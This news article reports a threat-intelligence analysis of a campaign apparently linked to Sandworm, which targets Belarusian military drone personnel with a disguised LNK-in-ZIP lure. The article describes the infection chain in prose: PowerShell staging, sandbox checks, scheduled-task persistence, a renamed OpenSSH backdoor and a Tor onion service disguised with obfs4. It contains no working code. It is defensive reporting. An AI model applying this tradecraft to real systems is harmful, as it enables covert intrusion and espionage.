By rssfeeds-admin 
The malicious archive was explicitly designed to lure personnel from the Belarusian Special Operations Command specializing in UAV and drone operations, suggesting targeted intelligence collection on regional military capabilities.
Advanced Multi-Stage Infection Chain
The attack begins with a ZIP file containing a Windows shortcut (LNK) disguised as a legitimate PDF. When executed, the LNK triggers embedded PowerShell commands that extract another hidden archive, install payloads under %appdata%logicpro, and execute obfuscated scripts.
These scripts validate system conditions, such as the number of LNK files and active processes, to evade sandbox detection before proceeding with infection.
After the environmental checks, a decoy PDF opens to maintain user trust while the malware silently establishes persistence through a scheduled task.
This task creates two key services on the infected host a backdoor enabled via OpenSSH for Windows and an anonymized communication layer via the Tor network, enhanced with obfs4 traffic obfuscation technology.
SSH and Tor-Based Covert Access
CRIL’s analysis revealed that the malware deploys githubdesktop.exe, a renamed Microsoft-signed OpenSSH executable configured to run an SSH service on port 20321 using RSA key-based authentication only.
The configuration file restricts access to preloaded authorized keys, ensuring only the attacker’s private key can authenticate. An SFTP subsystem (ebay.exe) facilitates file transfer and exfiltration operations.
The second scheduled task launches a customized Tor binary (pinterest.exe) configured to host an onion service linked to the SSH, RDP, and SMB ports, providing the threat actor with remote desktop access, secure file transfer, and network share exploration.
The obfs4 plugin (confluence.exe) disguises all Tor traffic as regular network communication, effectively concealing activity from traditional monitoring systems.
Data exfiltration occurs via a curl command routed through a SOCKS5 proxy, transmitting the host’s unique onion address and campaign identifiers to the command-and-control infrastructure.
CRIL successfully replicated the attack and established SSH connectivity, confirming full remote access capability via the Tor-anonymized channel.
Although no secondary payloads were detected, researchers assess with moderate confidence that this intrusion shares technical links with the December 2024 Sandworm (APT44/UAC-0125) campaign.
The obfs4 integration, pre-generated RSA keys, and improved persistence mechanisms mark an evolution of Sandworm’s tactics, emphasizing continued adaptation in state-backed cyber espionage targeting Eastern European military assets.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Hackers Hide SSH-Tor Backdoor Inside Weaponized Military ZIP Documents appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.